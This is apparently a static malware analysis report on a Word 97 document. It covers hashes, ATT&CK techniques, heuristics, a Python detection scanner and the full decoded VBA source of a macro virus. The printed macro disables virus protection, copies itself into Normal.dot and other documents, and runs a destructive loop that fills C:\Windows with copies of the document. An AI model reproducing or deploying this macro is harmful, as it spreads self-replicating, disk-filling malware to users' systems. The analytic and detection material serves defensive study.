Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 352c4fc689a2bdcd…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 29.5 KB
Created: 2000-01-13 16:46:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b43a055004c4ff6635b75f821152d1b0
SHA-1: 780e9908745141735c666a76b7f1c094fe95a946
SHA-256: 352c4fc689a2bdcd7fd66ebfe3a06e9530b2ab4f96d6c29a0901c2164bde0941
Risk score: 160

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word 8.0 (Word 97) document whose ThisDocument module contains a VBA macro virus. The entry point is Document_close, so the code runs when the document is closed. It first disables Word's macro virus warning (Options.VirusProtection = False), then uses the VBA project object model (ActiveDocument.VBProject and NormalTemplate.VBProject) to copy the module source between the open document and the Normal template, using the string constant 'la macro de colombia xx' as an infection marker so that an already infected module is not re-infected. Document-to-Normal infection runs whenever Normal is still clean; Normal-to-document infection is gated by a random check that passes 2 times in 10 (Nume equal to 7 or 3). Infecting Normal.dot gives the macro persistence and spreads it to other documents that use that template. The macro also carries a destructive payload: in July through December of any year from 2000 on, it changes to C:\Windows\ and saves the active document as AA<n>AA.DOC in a loop bounded at 999,999,991 iterations, filling the system directory and the disk. The error handler (Finm) deletes the document's own module on any failure. The ClamAV detection (Doc.Trojan.Marker-27) and the legacy WordBasic auto-exec marker support the verdict; note that the heuristic text "no modern VBA project was recovered" is contradicted by the olevba extraction below, which recovered the full module, and that the artifact's "Obfuscation or payload: unlikely" flag is right about obfuscation but not about the SaveAs loop, which should be treated as a payload.

Heuristics (3)

  • ClamAV: Doc.Trojan.Marker-27 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-27
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
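The infection, persistence and payload indicators described in the summary and heuristics can be checked directly on the decoded VBA text. The Python below is an added example written for this page, not the analyzer's or oletools' own code: it runs a case-insensitive indicator scan over a constructed excerpt of the macro shown in this report, pulls out Const string literals as candidate infection markers, and flags the huge SaveAs loop as a payload. Indicator names, severities and the verdict logic are this example's own choices, not the report's heuristic identifiers.

```python
import re
from dataclasses import dataclass

# Constructed excerpt of the decoded VBA shown in this report: a handful of
# representative lines, not the full ThisDocument module.
SAMPLE_VBA = r'''Attribute VB_Name = "ThisDocument"
Private Sub Document_close()
  On Error GoTo Finm
  Const exi = "la macro de colombia xx"
  Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
  Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
  Options.VirusProtection = False
  contemodu = Docu.CodeModule.Lines(1, Docu.CodeModule.CountOfLines)
  Plan.CodeModule.addfromstring contemodu
  If Year(Now()) >= 2000 And Month(Now()) > 6 Then
    ChangeFileOpenDirectory "C:\Windows\"
    For i = 1 To 999999991
        ActiveDocument.SaveAs FileName:=("AA" & i & "AA.DOC")
    Next
  End If
End Sub
'''


@dataclass(frozen=True)
class Finding:
    name: str
    severity: str
    line: int
    text: str


# Indicator names and severities are this example's own (assumption), not
# the report's heuristic IDs. VBA is case-insensitive ("addfromstring" in the
# sample is AddFromString), so every pattern is compiled with re.IGNORECASE.
INDICATORS = [
    ("auto_exec_event", "medium",
     r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
     r"(?:Document_(?:Open|Close|New)|Auto(?:Open|Close|Exec|New|Exit))\b"),
    ("vbproject_access", "high", r"\.VBProject\.VBComponents\b"),
    ("normal_template_access", "high", r"\bNormalTemplate\.VBProject\b"),
    ("code_module_write", "high",
     r"\.CodeModule\.(?:AddFromString|InsertLines|DeleteLines|ReplaceLine)\b"),
    ("virus_protection_off", "critical",
     r"\bOptions\.VirusProtection\s*=\s*False\b"),
    ("date_trigger", "low", r"\b(?:Year|Month|Day)\s*\(\s*Now\s*\(\s*\)\s*\)"),
    ("huge_loop_bound", "medium", r"\bFor\s+\w+\s*=\s*\d+\s+To\s+\d{7,}\b"),
    ("save_as", "low", r"\.SaveAs\b"),
]
COMPILED = [(n, s, re.compile(p, re.IGNORECASE)) for n, s, p in INDICATORS]

STRING_CONST = re.compile(r'^\s*Const\s+(\w+)\s*=\s*"([^"]*)"', re.IGNORECASE)


def scan_vba(source):
    """Return one Finding per (line, indicator) hit, in line order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, severity, rx in COMPILED:
            if rx.search(line):
                findings.append(Finding(name, severity, lineno, line.strip()))
    return findings


def string_constants(source):
    """String literals bound with Const: candidate infection markers."""
    return {m.group(1): m.group(2)
            for m in (STRING_CONST.match(l) for l in source.splitlines()) if m}


def classify(findings):
    """(verdict, has_payload). Self-replication needs an event to run from,
    VBA project object-model access, and a write into a code module."""
    names = {f.name for f in findings}
    if {"auto_exec_event", "vbproject_access", "code_module_write"} <= names:
        verdict = "macro-virus"
    elif "vbproject_access" in names:
        verdict = "suspicious-vbproject-access"
    else:
        verdict = "no-self-replication-indicators"
    has_payload = {"huge_loop_bound", "save_as"} <= names
    return verdict, has_payload


if __name__ == "__main__":
    hits = scan_vba(SAMPLE_VBA)
    for f in hits:
        print(f"L{f.line:<3} {f.severity:<8} {f.name:<24} {f.text}")
    print("markers:", string_constants(SAMPLE_VBA))
    print("verdict, payload:", classify(hits))
```

The scan is deliberately line-oriented so each hit carries a line number an analyst can jump to in the olevba output; the verdict deliberately requires all three self-replication indicators together, because VBProject access alone also appears in legitimate add-in code.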

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9745 bytes
SHA-256: 88620f6010869a08ec10413d58301eff6e3504eb1fbbd19d76f4d7e938cd389a
Detection: ClamAV: Doc.Trojan.Marker-27
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script). The preview holds the decoded VBA source of the ThisDocument module, followed by a commented P-code disassembly (pcodedmp-style) of the same module stream:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1HNormal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_close()
  
  On Error GoTo Finm
  If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
      Const exi = "la macro de colombia xx"
      Dim DInfec, planinfec As Boolean
      Dim Docu, Plan As Object
      Dim modulin, contemodu, Ninfec As String
      Dim Nume As Integer
      Dim Copform As Object
  
   
      Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
      Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
      
      SaveDoc = ActiveDocument.Saved
      Saveplan = NormalTemplate.Saved
   
      DInfec = Docu.CodeModule.Find(exi, 1, 1, 40000, 40000)
      Plainfec = Plan.CodeModule.Find(exi, 1, 1, 40000, 40000)

      'Ninfec = "'" & " "
      
      Options.VirusProtection = False
   
      Nume = Mid(Int(Rnd() * 10), 1, 1)
      Nume = Nume
      nume1 = 7
      Nume2 = 3
      If Nume = nume1 Or Nume = Nume2 Or Plainfec = False Then
         If DInfec = True And Plainfec = False Then
            On Error Resume Next
            For il = 1 To Plan.CodeModule.CountOfLines
                Plan.CodeModule.DeleteLines 1
            Next
            On Error GoTo Finm
            'Docu.CodeModule.addfromstring Ninfec
            contemodu = Docu.CodeModule.Lines(1, Docu.CodeModule.CountOfLines)
            Plan.CodeModule.addfromstring contemodu
         End If

         If DInfec = False And Plainfec = True Then
            On Error Resume Next
            For il = 1 To Docu.CodeModule.CountOfLines
                Docu.CodeModule.DeleteLines 1
            Next
            On Error GoTo Finm
           'Plan.CodeModule.addfromstring Ninfec
            contemodu = Plan.CodeModule.Lines(1, Plan.CodeModule.CountOfLines)
            Docu.CodeModule.addfromstring contemodu
         End If
         
         If SaveDoc = True Then ThisDocument.Save
         If SaveDoc = True And Plainfec = False Then NormalTemplate.Save
      End If
  End If
    sd = Day(Now()) & "-" & Month(Now()) & "-" & Year(Now())
  sd = Trim(sd)
  If Year(Now()) >= 2000 And Month(Now()) > 6 Then
    ChangeFileOpenDirectory "C:\Windows\"
    For i = 1 To 999999991
        ActiveDocument.SaveAs FileName:=("AA" & i & "AA.DOC"), FileFormat:= _
        wdFormatDocument, LockComments:=False, Password:="", AddToRecentFiles:= _
        True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
        False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
        SaveAsAOCELetter:=False
    Next
  End If
  GoTo Finb
  
Finm:
  On Error Resume Next
  For il = 1 To Docu.CodeModule.CountOfLines
    Docu.CodeModule.DeleteLines 1
  Next
  GoTo Finb
Finb:
 On Error Resume Next
End Sub

' Processing file: /opt/analyzer/scan_staging/8ada112925dd4672b6739f7749fc41c3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4965 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_close())
' Line #1:
' Line #2:
' 	OnError Finm 
' Line #3:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #4:
' 	Dim (Const) 
' 	LitStr 0x0017 "la macro de colombia xx"
' 	VarDefn exi
' Line #5:
' 	Dim 
' 	VarDefn DInfec
' 	VarDefn planinfec (As Boolean)
' Line #6:
' 	Dim 
' 	VarDefn Docu
' 	VarDefn Plan (As Object)
' Line #7:
' 	Dim 
' 	VarDefn modulin
' 	VarDefn contemodu
' 	VarDefn Ninfec (As String)
' Line #8:
' 	Dim 
' 	VarDefn Nume (As Integer)
' Line #9:
' 	Dim 
' 	VarDefn Copform (As Object)
' Line #10:
' Line #11:
' Line #12:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 

... (truncated)